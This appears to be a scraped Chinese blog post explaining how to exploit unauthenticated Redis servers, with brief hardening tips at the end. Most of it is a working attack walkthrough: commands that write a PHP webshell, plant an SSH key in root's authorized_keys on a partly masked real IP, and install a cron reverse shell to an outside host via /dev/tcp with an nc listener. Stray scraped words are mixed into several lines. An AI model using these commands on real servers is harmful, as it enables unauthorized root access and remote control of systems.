Redis未受權漏洞利用方式

時間  2019-11-09
標籤 redis 受權 漏洞 利用 方式 欄目 Redis 简体版
原文   原文鏈接

總結一下redis未受權拿shell:php

redis-cli -h ipweb

>info 查看系統類型redis

 

Windowsshell

1.找網站絕對路徑
2.config set dir 絕對路徑根路徑bash

config get dir服務器

config set dbfilename indexbak.phpssh

set webshell "<?php phpinfo();?>"tcp

save網站

 

Linux系統:spa

第一種:寫密鑰

第二種:寫crotab反彈shell

第三種:找絕對路徑寫webshell

 

1)本地生成祕鑰

root@GanDolf:~# ssh-keygen  -t rsa

 

2)將公鑰寫入一個文件

root@GanDolf:~# cd /root/.ssh/

root@GanDolf:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

3)鏈接redis寫入文件root@GanDolf:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit

OK
root@GanDolf:~/.ssh# redis-cli  -h 210.73.90.xxx

210.73.90.xxx:6379> config set dir /root/.ssh/
OK
(1.39s)
210.73.90.xxx:6379> CONFIG GET dir
1) "dir"
2) "/root/.ssh"
210.73.90.xxx:6379> config set dbfilename "authorized_keys"
OK
(1.03s)
210.73.90.xxx:6379> SAVE
saOK
(1.40s)
210.73.90.xxx:6379> SAVE
OK
210.73.90.xxx:6379> exit
root@GanDolf:~/.ssh# ssh

4)鏈接服務器

root@GanDolf:~/.ssh# ssh -i id_rsa root@210.73.90.xxx

 

 

2、 利用方式不須要猜 web路徑,寫到cron裏面

echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/xxx.xxx.xx.120/2333 0>&1\n\n"|redis-cli -h 42.121.237.23 -x set 1
redis-cli -h 42.121.237.23                                                                                      
42.121.237.23:6379> config set dir /var/spool/cron
OK
42.121.237.23:6379> config set dbfilename root
OK
42.121.237.23:6379> save
OK


而後本機nc -lvv 2333
一下子shell就彈回來了。

 

 

修復建議:

1)修改默認端口

2)監聽本地端口

3)使用非root啓動,不然出現漏洞1,直接拿到root權限

4)修改配置文件,禁用相關命令

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程